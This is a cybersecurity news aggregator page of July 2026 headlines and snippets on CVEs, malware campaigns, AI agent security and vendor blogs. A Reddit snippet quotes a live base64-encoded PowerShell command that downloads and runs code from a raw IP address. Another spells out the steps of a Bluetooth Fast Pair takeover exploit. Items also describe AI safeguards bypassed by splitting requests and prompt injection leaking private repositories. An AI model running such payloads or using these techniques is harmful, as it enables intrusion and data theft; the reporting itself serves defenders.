Cybersecurity News and Vulnerability Aggregator

Cybersecurity news aggregator

Top Cybersecurity Stories Today

The Hacker News 6h ago
CVE

Researchers at Nebula Security have disclosed GhostLock (CVE-2026-43499), a 15-year-old Linux kernel flaw that lets any logged-in user take full root control of a machine that has not been patched. The vulnerable code has shipped by default in essentially every mainstream distribution since 2011. The flaw needs no special permission, no unusual settings, and no network

The Hacker News 7h ago

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added four security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The vulnerabilities are listed below - CVE-2026-48282 (CVSS score: 10.0) - A path traversal vulnerability in Adobe ColdFusion that could lead to arbitrary code execution in the context of the

The Hacker News 20h ago

A critical flaw in Google's Dialogflow CX could have let an attacker with edit rights on one Code Block-enabled agent compromise other Code Block-enabled agents in the same Google Cloud project. From there, they could read live conversations, steal the data users shared, and make the bots send attacker-written messages, including requests to re-enter a password. Security firm Varonis found it

Cloudflare Jul 7

Today, the UK government launched the Cyber Resilience Pledge : a voluntary framework inviting organizations to commit to foundational cybersecurity governance, board-level accountability, and comprehensive cybersecurity coverage across supply chains. Cloudflare is proud to join the pledge’s founding cohort of signatories and continue our long-standing work with the Department of Science, Innovation and Technology (DSIT), National Cyber Security Centre, and others to shape a more secure, future-ready digital economy for the UK . The pledge's core pillars — democratizing security, leadership accountability, and radical transparency — have been at the heart of Cloudflare since day one. Instead of approaching this framework as a new set of commitments to meet, we see it as a welcome validation from the UK government of the security philosophy and principles Cloudflare has championed for over a decade. We are glad to see the rest of the industry moving in this direction. This pledge is an important step, and it comes at a time of significant cyber risk. In the first quarter of 2026, Cloudflare's global network blocked an average of 234 billion cyber threats every day . Recently, we mitigated a hyper-volumetric DDoS attack that peaked at 31.4 Tbps . At th

The Hacker News Jul 7

Several versions of firmware released by Chinese network device manufacturer Tenda have been found to embed an undocumented authentication backdoor that enables administrative access to the devices' web management interfaces, the CERT Coordination Center (CERT/CC) warned Monday. "An attacker can exploit this vulnerability, tracked as CVE-2026-11405, to bypass the password verification process

Latest

Wednesday, July 8
Krebs on Security Just now

A cybersecurity startup dangling millions of dollars to acquire zero-day security vulnerabilities in popular software is run by a pair of far-right conspiracy theorists and convicted felons whose most recent ventures included fake intelligence companies and a now-defunct AI-based lobbying platform they operated under assumed names. The X/Twitter account IRIS C2 (@C2IRIS) has gained more than 4,000 followers since its creation in January 2025, posting frequently about security vulnerabilities, AI and software exploits. IRIS C2 says it is a company in McLean, Va. that sells offensive cybersecurity capabilities. The IRIS C2 website dangles the possibility of million-dollar payouts for exploits to attract talent. “Our business model is this,” reads a pinned post on top of the IRIS C2 account on X. “Attract the very best vulnerability researchers and exploit developers in the world to join our company. This mostly revolves around junior engineers with raw talent/extremely high IQ. We don’t care if they have a college degree/industry experience.” The website linked in that profile — irisc2[.]com — says the company is hiring for a number of open positions, and a recent post on its LinkedIn page enthuses about an overwhelming number of appli

The Hacker News 1h ago

New research shows that a signed Git commit's hash is not the one-of-a-kind name that much of the software world assumes it to be. Given any signed commit, someone without the signing key can mint a second commit with the same files, author, and date, and a valid signature, GitHub still stamps "Verified." Everything a reviewer would check matches. The commit's hash does not. That matters

The Hacker News 1h ago

For years, account takeover (ATO) followed a predictable script. Attackers bought stolen credentials in bulk, ran them through automated tools, and waited for matches. Credential stuffing was cheap, scalable, and for defenders, relatively well understood. That era is ending. Not because attackers gave up, but because the front door finally got harder to kick in. Passkeys are now mainstream.

The Hacker News 1h ago

An AI coding assistant that refuses to answer a dangerous request in its chat box can answer it anyway if the same request is broken into small, ordinary-looking steps inside a code editor. That is the finding of a new study of GitHub Copilot by researchers Abhishek Kumar and Carsten Maple. The models they tested through Copilot, Claude from Anthropic, and Gemini from Google, refused

Trail of Bits 2h ago
CVE

In April we released Mewt , our open-source mutation-testing engine that finds the gaps in your test suite. Today we’re expanding it with support for DAML, the language Canton Network applications are written in. Mewt now reads DAML, generates several classes of mutants (including two built for DAML’s authorization primitives), and runs them through your existing test suite to count how many mutants survive. If you want to try it, simply install Mewt from the repository , point a mewt.toml at your project and its test command, and use mewt run . For a team shipping DAML to production, that count is what a passing test run is actually worth: it puts a number on how much your suite checks, whereas a green run on its own does not. Why DAML’s coverage reports lie Test coverage is the most reassuring lie in smart-contract development. Hitting 100% line coverage tells you the test runner walked the code; it does not tell you whether any test would fail if that code stopped doing what it is supposed to. We have been grading test harnesses by how many mutants they kill since at least 2019 , and our primer on finding the bugs your tests don’t catch shows how a green suite can still miss the bug that matters. DAML’s built-in coverage measures execution at the template and choice level: which templates were created and which choices were exercised over the test run. It reports whether each ch

r/cybersecurity 3h ago

Help Net Security put together a useful roundup of 20 newer open-source cybersecurity tools. [https://www.helpnetsecurity.com/2026/07/08/20-latest-open-source-cybersecurity-tools/](https://www.helpnetsecurity.com/2026/07/08/20-latest-open-source-cybersecurity-tools/) What stood out to me is how many of them are now built around AI security, not just traditional vuln scanning. Some interesting ones from the list: * AIMap: finds exposed Ollama, MCP, and AI inference endpoints * Agent Beacon: telemetry for AI coding agents like Claude Code, Codex CLI, Cursor, etc. * Agent Threat Rules: detection format for AI agent security threats * OWASP Agent Memory Guard: protects agent memory from poisoned or malicious instructions * Pipelock: network enforcement layer for AI agents * Praxen: checks whether an agent actually follows its declared policy * Kiji Privacy Proxy: masks PII before prompts reach external AI services * DockSec, Nika, Rustinel, Sandyaa, Vigolium, OpenHack, and others cover containers, SAST, endpoint detection, and vulnerability research I’d also add a few related AI security tools to watch, even if they are not part of the OSS roundup: * LangProtect Guardia: visibility and governance for enterprise AI usage and shadow AI * LangProtect Armor: runtime AI firewall for LLM apps, prompt injection, secrets, PII, unsafe outputs, and policy enforcement * LangProtect Vector: protection around RAG/vector data flows, retrieval leakage, and sensitive context exposure The pattern is pretty clear now: security teams are going to need controls around what AI systems can access, retrieve, remember, execute, and send out. This is starting to look less like “AI features inside security tools” and more like a separate AI security layer that teams will have to manage directly. Has anyone here tested any of these in a lab or production environment yet?

Heimdal Security 3h ago

Your client is no longer just buying your security advice. They’re auditing whether you live by it. That was the clearest message from the exclusive interview I had with Heather MacDonald, an MSP finance specialist and owner of Counting Creators. Heather’s exactly the kind of customer MSPs should be paying attention to: informed, commercially minded, and willing to challenge […] The post Cyber-Aware Customers Are Raising the Bar for MSPs and Other Vendors appeared first on Heimdal Security Blog .

The Hacker News 4h ago

A Chinese threat actor tracked as UAT-7810 is actively refining its bespoke malware to expand its Operational Relay Box (ORB) network by breaking into internet-facing networking devices. According to findings from Cisco Talos, UAT-7810 is an advanced persistent threat (APT) actor that's responsible for maintaining and proliferating LapDogs, an ORB network that first came to light in June 2025.

The Hacker News 6h ago
CVE

Researchers at Nebula Security have disclosed GhostLock (CVE-2026-43499), a 15-year-old Linux kernel flaw that lets any logged-in user take full root control of a machine that has not been patched. The vulnerable code has shipped by default in essentially every mainstream distribution since 2011. The flaw needs no special permission, no unusual settings, and no network

r/cybersecurity 7h ago
CVE

Attackers are exploiting the critical Gitea vulnerability CVE-2026-20896 to bypass authentication with a single HTTP header and access vulnerable repositories and secrets. [https://www.securityweek.com/critical-gitea-flaw-under-active-exploitation-researchers-warn/](https://www.securityweek.com/critical-gitea-flaw-under-active-exploitation-researchers-warn/)

The Hacker News 7h ago

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added four security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The vulnerabilities are listed below - CVE-2026-48282 (CVSS score: 10.0) - A path traversal vulnerability in Adobe ColdFusion that could lead to arbitrary code execution in the context of the

r/cybersecurity 8h ago

Sysdig’s JADEPUFFER report is excellent and worth reading. Instead of summarizing the incident, I tried something different. I translated every attack stage into: the assurance failure that enabled it the control that should have prevented or detected it the validation evidence an organization should be able to produce The result is a machine-readable control map that could be consumed by GRC tools, SIEMs, or autonomous agents instead of just existing as another blog post. Curious whether this is a useful way to analyze AI security incidents, or whether you’d structure it differently. https://apeiris.ai/blog/jadepuffer-agentic-ransomware/

Tuesday, July 7
r/cybersecurity 14h ago

Most Bluetooth devices are paired and set to non-discoverable after initial setup; since general discovery scans are what most people and OSes disable. The Whisper Pair exploit (CVE-2025-36911) bypasses this by connecting via BLE and writing a forged Fast Pair pairing request (0x00 + random 64-byte public key + nonce) to the key-based pairing characteristic (UUID 1236). It then writes a fake 16-byte Account Key to UUID 1238, tricking the device into completing the bonding process. Simultaneously, the tool triggers bluetoothctl pair and monitors its output for the \[CHG\] Device message, which reveals the permanent BD\_ADDR when the device switches from its temporary random MAC, exposing the factory-programmed address and enabling reliable re-connection. From there, the tool can flood the device with L2CAP burst-cycling to knock it offline, and then automatically detect the "no response" state and attempt to take over via bluetoothctl, all in one automated workflow. By 2022, Google Fast Pair had become the default Bluetooth pairing standard, with over 320 million pairings across 300+ device types from every major brand, solidifying its dominance across Android (6.0+ for phones, 11+ for cross-device), Chromebooks, Google TV, Wear OS, and even cars from BMW and Ford. This is what makes this PoC (Whisper\_Bully) work on almost every reasonably new Bluetooth device, without any RF analysis hardware (Ubertooth, HackRF, etc.), without hopping channels, without guessing the next hop, and without flooding multiple channels like expensive jammers do. It simply doesn't need any of that, and works like a charm without them. [https://github.com/Ymsniper/Whisper\_Bully](https://github.com/Ymsniper/Whisper_Bully) If this sounds useful, a star on the repo goes a long way ⭐

The Hacker News 20h ago

A new Android malware operation called RedWing is being rented out on Telegram as a ready-made bank-fraud service. It lets even low-skill criminals take over a victim's phone, steal their banking logins, and capture the one-time codes that protect their accounts. Zimperium's zLabs, which found the operation, says it looks like a new variant of Oblivion, a $300-a-month rent-a-malware tool

The Hacker News 20h ago

A critical flaw in Google's Dialogflow CX could have let an attacker with edit rights on one Code Block-enabled agent compromise other Code Block-enabled agents in the same Google Cloud project. From there, they could read live conversations, steal the data users shared, and make the bots send attacker-written messages, including requests to re-enter a password. Security firm Varonis found it

r/blueteamsec 21h ago

Quick disclosure before anything else: I work at DeepTempo, and one of the models in this benchmark (LogLM) is ours. So yeah, factor that in as you read. The upside is that all of it is open source and reproducible, which means you don't have to trust me on a single number here. Clone it, run it, tell me where I'm wrong. That's the whole reason it's public. I've been quietly annoyed for a while now. Every "AI in the SOC" pitch I see opens with a gorgeous demo and somehow never gets around to showing how the thing holds up on the boring, noisy telemetry a defender stares at all day. So I finally built a benchmark for exactly that (SOCBench), and I started with the least glamorous but most challenging SOC task there is: detection on raw NetFlow. Here's the part I want to be upfront about: I rigged the setup in the LLMs' favor, on purpose. \* The three frontier models got to run as full multi-turn agents. Bounded ReAct loop, read-only investigative tools, four expert personas, big context budgets, and a cost cap so they couldn't run forever. \* LogLM got none of that. It's a small encoder-only model, and all it ever saw was the raw flows. One shot, no tools, no personas. Here's the traffic, what's malicious? \* Everyone got the same 1,205 eval units (Stratosphere Labs captures), the same hidden ground truth, and it was all zero-shot. The logic was simple. If the LLMs were going to fall over, I wanted them to do so under the most flattering conditions I could create — every advantage stacked on their side, and our little encoder walking in with nothing but the flows. So what happened? \* They can tell when something's off. Verdict F1 (just "is this unit malicious or not") came in between 0.86 and 0.93 for each model's best persona. Respectable, no complaints. \* But they cannot keep their mouth shut on clean traffic. This is the one that matters, as in the real world, almost everything on the wire is benign. ​ | Model | FP on benign inside malware | FP on fully benign | |---|---|---| | Claude Opus 4.7 | 36% | 39% | | GPT-5.4 | 53% | 43% | | Gemini 2.5 Pro | 41% | 86% | | LogLM | <1% | <2% | \* They can detect, but they can't point. Fine, it flagged a unit. Can it tell you which flows drove the call? Per-flow F1: Claude 65%, Gemini 52%, GPT 44%. LogLM sits at 99%. An alert that basically says "something in these 1,000 flows is bad, have fun" doesn't save your analyst a single minute. \* And it's not cheap. Per single-persona alert: Claude $0.150, Gemini $0.062, GPT $0.057. LogLM is under $0.0001. Feels trivial until you do the multiplication: at a million alerts a day, even the cheapest LLM is burning \\\~$57k/day before a human looks at anything. At telco scale, you're into hundreds of millions a day, on inference alone. Why this happens: these models have read basically everything ever written about how network traffic can be malicious, so their internal "is this flow suspicious?" prior sits way, way above the real base rate out in the wild. It stays hidden on a benchmark that's mostly malicious. The second you ask the model to sit quietly on clean traffic, it comes roaring out. LLMs are excellent at the stuff that reads like a story with steps: triage, enumeration, chaining an exploit, turning a paragraph into a detection rule, and writing up an incident. Flow-level detection just isn't that kind of problem. There's no narrative thread to follow; the signal is buried in the distribution across thousands of connections. That's a job for an encoder, not an agent. SOCBench is open, and I want people to poke holes in it and push it further. A benchmark for AI in security really shouldn't be one vendor's homework assignment, mine included. If you work in detection, DFIR, or hunting, I'd love a few things: datasets that look like your environment, thoughts on the scoring (especially the explainability lenses), ideas for tasks beyond detection (triage, IR, hunting, detection engineering are all next), or just someone running it and telling me where it breaks. Repo: \[github.com/DeepTempo/socbench\](http://github.com/DeepTempo/socbench) Full writeup with all the tables: \[deeptempo.ai/blogs/the-36-percent-false-positive-problem-with-llm-in-the-soc\](http://deeptempo.ai/blogs/the-36-percent-false-positive-problem-with-llm-in-the-soc) Have at it in the comments.

The Hacker News 22h ago

A Microsoft 365 device code phishing campaign has been observed leveraging collaboration-themed lures to take control of victim accounts between the last week of June 2026 and into early July, per findings from ZeroBEC. "The campaign did not depend on a fake Microsoft password page. It used a malicious collaboration-style lure to push users into the legitimate Microsoft device login experience,

The Hacker News 23h ago

A public issue can trick GitHub Agentic Workflows into leaking the contents of an organization's private repositories, researchers at Noma Security have shown. The attacker needs only to open a normal-looking issue on a public repository, with no stolen credentials and no access to the organization. If that organization has given the agent read access across its repositories, private ones

The Hacker News 23h ago

U.S. prosecutors linked an alleged Scattered Spider hacker to a break-in at a luxury jewelry retailer using a persistent Windows device ID, according to a newly unsealed federal complaint. Microsoft records tied that ID first to the account the attackers used to keep access during the May 2025 intrusion, then to online accounts prosecutors say belong to 19-year-old Peter Stokes. Stokes is

Cloudflare Jul 7

Today, the UK government launched the Cyber Resilience Pledge : a voluntary framework inviting organizations to commit to foundational cybersecurity governance, board-level accountability, and comprehensive cybersecurity coverage across supply chains. Cloudflare is proud to join the pledge’s founding cohort of signatories and continue our long-standing work with the Department of Science, Innovation and Technology (DSIT), National Cyber Security Centre, and others to shape a more secure, future-ready digital economy for the UK . The pledge's core pillars — democratizing security, leadership accountability, and radical transparency — have been at the heart of Cloudflare since day one. Instead of approaching this framework as a new set of commitments to meet, we see it as a welcome validation from the UK government of the security philosophy and principles Cloudflare has championed for over a decade. We are glad to see the rest of the industry moving in this direction. This pledge is an important step, and it comes at a time of significant cyber risk. In the first quarter of 2026, Cloudflare's global network blocked an average of 234 billion cyber threats every day . Recently, we mitigated a hyper-volumetric DDoS attack that peaked at 31.4 Tbps . At th

The Hacker News Jul 7

Software supply chain security was hard enough. Then AI joined the build pipeline. For five years, "software supply chain security" meant one question: what's in your code? Which open-source packages, which versions, which transitive dependencies three layers deep that nobody chose on purpose? SolarWinds, Log4Shell, and XZ Utils all taught the same lesson: the risk lives less in the code a

The Hacker News Jul 7

A suspected China-aligned threat activity cluster has been observed exploiting Roundcube webmail software belonging to physics and engineering departments of U.S. and Canadian universities as part of a new campaign. The activity involves the exploitation of now-patched, critical security flaws in the open-source email solution, such as CVE-2024-42009 (CVSS score: 9.3), to siphon credentials,

NVISO Labs Jul 7

Continuing our journey through Sentinel ingestion cost reduction, this part focuses on one of the most expensive log sources: firewalls, and more specifically, network traffic events. Network traffic logs from firewalls are highly voluminous and often become the largest contributor to data ingestion costs. At the same time, they remain a valuable source of information during Incident Response or while developing Threat Detection use cases, as they provide a centralized view of network activity across the environment. T

The Hacker News Jul 7

Several versions of firmware released by Chinese network device manufacturer Tenda have been found to embed an undocumented authentication backdoor that enables administrative access to the devices' web management interfaces, the CERT Coordination Center (CERT/CC) warned Monday. "An attacker can exploit this vulnerability, tracked as CVE-2026-11405, to bypass the password verification process

The Hacker News Jul 7

BeyondTrust has released updates to address two critical security flaws affecting Remote Support (RS) and Privileged Remote Access (PRA) products that, if successfully exploited, could allow unauthenticated attackers to take control of susceptible devices. The vulnerabilities are listed below - CVE-2026-40138 (CVSS score: 9.2) - A pre-authentication vulnerability exists in the

Monday, July 6
Praetorian Jul 6

Overview In the first installment of this series , I walked through how I leveraged large language models to assist in identifying several vulnerabilities in the FreeBSD kernel, including a stack-based buffer overflow assigned CVE-2026-3038 . This raised a natural follow-up question. Can language models effectively write exploits for memory corruption vulnerabilities? This article explores that question. I’ll detail two exploit chains I developed that achieve a full escape from a FreeBSD jail environment. The first chain pairs a stack-based buffer overflow with a stack-based information leak to defeat both stack canaries and KASLR. The second takes a different path, combining a heap-based buf

The Hacker News Jul 6

An Iranian hacking group affiliated with Iran's Ministry of Intelligence and Security (MOIS) has been wielding a previously undocumented modular command-and-control (C2) framework dubbed Cavern (aka Cav3rn) targeting Israeli organizations. The activity, which has primarily singled out IT providers and government sectors, has been attributed to a threat cluster tracked by Check Point Research

CERT/CC Jul 6

Overview HP Printers in the Deskjet 2800 Series running firmware version &lt;=TBP1CN2612AR contain a missing authorization vulnerability tracked as CVE-2026-13753 . This vulnerability allows unauthenticated access to the printer's webserver API endpoints, exposing Wi-Fi credentials, management configuration details, and sensitive security data normally restricted to administrative users. Description Modern HP printers provide a web-based management interface for configuring content such as Wi-Fi Direct settings, SNMP management access, and device security options. When accessed normally through the browser interface, these pages explicitly require administrator credentials before sensitive information is displayed. This information is protected because, for example, Wi-Fi Direct controls the printer's direct wireless connectivity, and SNMP configuration settings can reveal detailed information about the device's monitoring and management controls. In affected firmware versions, the authorization requirement can be bypassed by sending direct, unauthenticated GET requests to multiple backend API endpoints. The affected endpoints return administrative configuration data without validating session state or authentication, including the Wi-Fi Direct SSID and plaintext passphrase, unique printer serial numbers and service IDs, and details about the device's administrative password state. This information is freely disclosed even though the corresponding web interface pages correctly enforce authentication, indicating an authorization flaw in the API layer. Impact A remote attacker with network access to the printer can bypass the web interface's authentication requirements and retrieve sensitive configuration data directly fr

The Hacker News Jul 6

Threat actors have been observed attempting to exploit a recently patched critical security flaw in Gitea Docker images, according to Sysdig. The vulnerability in question is CVE-2026-20896 (CVSS score: 9.8), a vulnerability that stems from the DevOps platform trusting the "X-WEBAUTH-USER" header from any source IP address, effectively allowing an unauthenticated internet client to get elevated

r/netsec Jul 6

This free class by Antonio Nappa of Fuzz Society builds up your knowledge from learning a toy 8-bit CPU architecture all the way to understanding how QEMU can emulate that architecture. Using this knowledge you can then understand how QEMU can emulate any architecture! Based on beta testing, this class takes an average of 8h47m to complete, and a median of 7h26m.

The Hacker News Jul 6

A streaming box should not need a threat model. Neither should a username field, a demo repo, a reset flow, or a browser permission prompt. That is the irritating part this week: the risky pieces were ordinary. Home devices became a routing cover. Clean code pulled dirt from a dependency. Identity shortcuts aged badly. AI systems trusted the wrong instructions. Same soft spot throughout: trust

Cloudflare Jul 6

Today we are launching Workers Cache : a tiered cache that sits in front of your Worker, configured by a single line of Wrangler config and the same Cache-Control headers you already know. When Workers Cache is enabled, every cacheable request to your Worker hits Cloudflare's cache first. If there's a fresh cached response, Cloudflare returns it directly — your Worker doesn't run, and you don't pay CPU time for it. On a miss, your Worker runs, and if your response is cacheable, Cloudflare stores it for the next request. The next request from anywhere on Earth can be served straight from cache. The whole thing is one config block: { "name": "my-worker", "main": "src/index.ts", "compatibility_date": "2026-05-01", "cache": { "enabled": true } } After that, you control caching the way HTTP has always wanted you to — by setting headers on your responses: return new Response(body, { headers: { "Cache-Control": "public, max-age=300, stale-while-revalidate=3600", "Cache-Tag": "products,product:123", }, }); And when content changes, your Worker purges its own cache: await ctx.cache.purge({ tags: ["product:123"] }); That's the whole API. There is no zone to configure, no rules engine to set up, no separate cache to provision, and no second product to log into. The Worker's code is the configuration surface, and the cache follows the Worker wherever it runs — on a custom domain, on workers.dev , behi

r/netsec Jul 6

Porting the functionality of dnscmd.exe into (slightly) more OPSEC safe Beacon Object Files (BOFs) so you can get domain admin rights when you manage to impersonate a user that is a member of the DnsAdmins group, or if using dnscmd.exe simply isn’t an option.

r/ReverseEngineering Jul 6

To reduce the amount of noise from questions, we have disabled self-posts in favor of a unified questions thread every week. Feel free to ask any question about reverse engineering here. If your question is about how to use a specific tool, or is specific to some particular target, you will have better luck on the [Reverse Engineering StackExchange](http://reverseengineering.stackexchange.com/). See also /r/AskReverseEngineering.

r/computerforensics Jul 6

https://preview.redd.it/xfm8scpfyjbh1.png?width=1240&format=png&auto=webp&s=cc1fc0bbeaca4dfd7aee75951f8ec61070e262bf Sharing some lessons from a challenging forensic PCAP analysis: 1. Map the C2 protocol first. Understanding how the attacker communicates tells you what to expect in every packet. 2. Encryption keys aren't always what they look like. A hex string can be interpreted multiple ways — raw bytes, UTF‑8 encoding, even UTF‑16. If your decrypted output is garbage, ask yourself whether you're using the right form of the key. 3. Responses matter as much as requests. In encrypted C2 channels, the server sends back just as much intel as the attacker sends up. 4. Gzip inside base64 inside C# inside AES. It sounds absurd, but nesting is a real obfuscation pattern. 5. Check file‑creation side effects. Sometimes the payload writes a file you can use as a decryption key elsewhere. If you're getting into forensics CTFs, grab a PCAP with at least 4k packets and try to reconstruct the full timeline — it's a different beast from Jeopardy‑style challenges.

Datadog Security Labs Jul 6

This post continues and concludes our series on Agent ID, by outlining steps that an administrator or security team can take to secure blueprints and agent identities created in their local Entra ID tenant.

Sunday, July 5
Saturday, July 4
r/Malware Jul 4

Our latest McAfee Labs research exposes a browser extension campaign that poses as a harmless note-taking tool while silently hijacking crypto transactions. The malware tampers with Chrome/Edge/Brave’s trust mechanisms to install without consent, resolves its command-and-control server via a blockchain smart contract (EtherHiding) to evade takedown, and swaps copied wallet addresses with attacker-controlled ones across BTC, ETH, XRP, BCH, and DASH — turning a routine copy-paste into an irreversible loss. Full technical breakdown and IOCs inside

Friday, July 3
r/Malware Jul 3

[they are getting smarter](https://preview.redd.it/d40lwwsmv1bh1.png?width=1407&format=png&auto=webp&s=deb513ded2423277ed3a8437e1d3763dc138d62c) this is what the script copied to my clipboard. funny that this website was opened for the first time, yet chrome gave it clipboard permission. lol iex(\[Text.Encoding\]::ASCII.GetString(\[Convert\]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgJ2h0dHA6Ly8xNjYuMS44OS45MS9fLycgLVVzZUJhc2ljUGFyc2luZyB8IEludm9rZS1FeHByZXNzaW9u')))

Heimdal Security Jul 3

Most breaches don’t start with a vulnerability nobody knew about. They start with one nobody patched in time. Vulnerability exploitation is now the single biggest way attackers get into a network. It has overtaken stolen credentials for the first time in the 19-year history of Verizon’s Data Breach Investigations Report, with 31% of breaches now […] The post How to scale your patches without scaling your team (the patch wave) appeared first on Heimdal Security Blog .

Heimdal Security Jul 3

Claude Mythos, an AI model from Anthropic, has found 23,019 software vulnerabilities in the past month. Fewer than 1% of them have been patched. That gap is the story. Finding a vulnerability used to be the hard part, the thing that limited how fast software got fixed. AI just closed that gap to almost nothing. […] The post AI didn’t break patching. It showed us patching was already broken. appeared first on Heimdal Security Blog .

r/Malware Jul 3

I have turned on my mac in the morning and got this message? Facts or Cap? https://preview.redd.it/kb4sv0aewyah1.png?width=1156&format=png&auto=webp&s=c1db885a6f856d112f9bb3918583af5c51a4a64a

Troy Hunt Jul 3

Presently sponsored by: Report URI: Guarding you from rogue JavaScript! Don’t get pwned; get real-time alerts & prevent breaches #SecureYourSite I can't recall if someone else originally came up with this saying or if I said it in some off-the-cuff comment and it just propagated, but since it's often attributed back to me , I'll relay it here regardless: Trying to delete yourself from the internet is like trying to take piss out of a swimming pool Depending on the publication, I'll tailor the saying to be either more broadly palatable or more, uh, "Australian", but the sentiment doesn't change: once data spreads on the internet, you can never put a lid on it. This is important in the context of data breaches because it speaks to the immutability of our exposed personal information. It also speaks to the limited practicality of services that promise to erase your data from the internet, and it's the constant outreach from these organisations looking for marketing opportunities on Have I Been Pwned (HIBP) that's prompted me to write this. Let's begin with those services, and because there are so many and I don't want to throw any of them under the bus, I won't name names. I also won't name them because whilst they're rather assertive in their marketing outreach, I do believe they're well-intentioned and I don't want to imply otherwise. And they have a role to play; it's ju

Thursday, July 2
Krebs on Security Jul 2

The Federal Bureau of Investigation (FBI) said today it worked with industry partners to seize hundreds of domains associated with NetNut , a sprawling residential proxy service operated by the publicly-traded Israeli company Alarum Technologies [NASDAQ: ALAR]. The action comes roughly two weeks after KrebsOnSecurity published findings from multiple security firms connecting NetNut to the Popa botnet, a collection of at least two million devices that have been compromised by malicious software with little or no consent from victims. The NetNut homepage today was replaced by this seizure banner from the FBI. On June 19, three different security firms issued similar findings : That NetNut is a residential proxy network which populates a botnet called Popa, and distributes software for devices commonly found in homes, such as smart TVs and streaming boxes. NetNut’s software turns those systems into always-on residential proxy nodes that are rented to others, who predominantly use them to relay abusive and intrusive Internet traffic, such as mass content scraping, advertising fraud, and account takeover ac

Praetorian Jul 2

How we built a procedural engine that learns your real cloud environment, generates decoy environments indistinguishable from production, and converts every attacker interaction into signal. In the myth, Daedalus built the Labyrinth of Knossos so well that he nearly couldn’t escape it himself. The corridors looked real. The paths felt purposeful. And the deeper you went, the harder it became to tell which direction led out. That’s the design constraint we gave ourselves when building Knossos for Praetorian Guard: generate cloud infrastructure so realistic that an attacker who lands inside it doesn’t realize they’ve already lost. Every API call they make, every role they assume, every secret they pull from Parameter Store, all of it is being recorded, scored, and fed back into the system that built the trap. The idea isn’t new. Honeypots have existed for decades. But the gap between a traditional honeypot and what a competent attacker expects to find in a real AWS account is enormous. Drop a single canary token in an otherwise empty VPC and you’ve told the attacker two things: you’re running deception, and there’s nothing interesting here. They pivot, and you’ve burned your one shot. Knossos takes a fundamentally different approach. Rather than scattering individual lures and hoping someone trips

CERT/CC Jul 2

Overview The GamersFirst Anti-Cheat (GFAC) driver GFAC.sys contains multiple local privilege escalations and denial-of-service vulnerabilities stemming from insecure handling of user-controlled input through a minifilter communication port. A local attacker can abuse these flaws to perform arbitrary kernel memory writes, obtain privilege escalation to SYSTEM, or trigger a system crash. Description GFAC is a proprietary anti-cheat software developed by video game publisher Little Orbit. GFAC includes a kernel-mode driver, GFAC_Sys_x64.sys , that exposes privileged functionality to user-mode applications through a minifilter communication port. Although these low-level interfaces are necessary for the software's operation, vulnerabilities can arise if user-mode access is not properly restricted and validated. CVE-2026-12166 GFAC_Sys_x64.sys contains a NULL pointer dereference condition in its initialization and request handling logic. A local attacker can trigger the vulnerable code path, causing the driver to read or write to a memory address assigned as NULL. Successful exploitation results in a system crash (“blue screen of death”). CVE-2026-12167 The minifilter communication port that GFAC_Sys_x64.sys exposes does not enforce sufficiently restrictive security descriptors. As a result, low-privileged users can establish connections to the driver and access functions intended only for trusted processes. [RM1.1][MB1.2][RM1.3]User access to privileged functions could help an attacker take advantage of other weaknesses in the driver. CVE-2026-12168 GFAC_Sys_x64.sys processes messages received through a minifilter communication

Trail of Bits Jul 2
CVE

We’re running Patch the Planet , an ongoing collaboration with OpenAI that pairs Trail of Bits engineers directly with more than 30 open-source projects. Its goal is to front-run a serious problem facing open-source maintainers: highly capable models like GPT-5.5-Cyber will soon create a firehose of bug reports, and OSS maintainers are already spread thin. Our plan is to point OpenAI’s latest models at real codebases, find the security bugs first, work with maintainers to patch them, and find ways to decrease the burden on maintainers in the long run. We’ll publish field reports like this one as the initiative progresses; follow along via the Patch the Planet tag. The expertise barrier that kept bespoke fuzzing campaigns out of reach for most attackers is gone. We watched GPT-5.5-Cyber build in a single day what would have taken weeks for a skilled security researcher : harnesses across a dozen entrypoints, sanitizer and variant builds, seeds, and multiple findings currently undergoing coordinated disclosure. This particular instance focused on zlib , a widely used data format and lossless data compression software library. We pointed GPT-5.5-Cyber at the library and drove it through Codex with the /goal command, asking it to find a specific class of bugs that are critically dangerous in compression libraries. We’ll publish the full harness and findings for inspection once the vulnerabilities are patched and a new release is cut. The lab GPT-5.5-Cyber built in a day We didn’t tell the model how to find these bugs. The obvious first move is to read the source code, but zlib

Wednesday, July 1
NVISO Labs Jul 1

Introduction This blog post addresses the practical implications of Post-Quantum Cryptography (PQC). It examines why waiting for vendors is a high-risk strategy and why organizations must assume ownership of their own quantum-readiness efforts . It also introduces a more effective quantum-readiness playbook : a practical, risk-driven approach aimed at reducing exposure early, rather than relying on the commonly adopted inventory-first model. This is Part 2 of a two-part series and focuses on the practical implications of Post-Quantum Cryptography, including why organizations must take ownership of their own quantum-readiness journey and how a risk-driven approach can support

Story Overview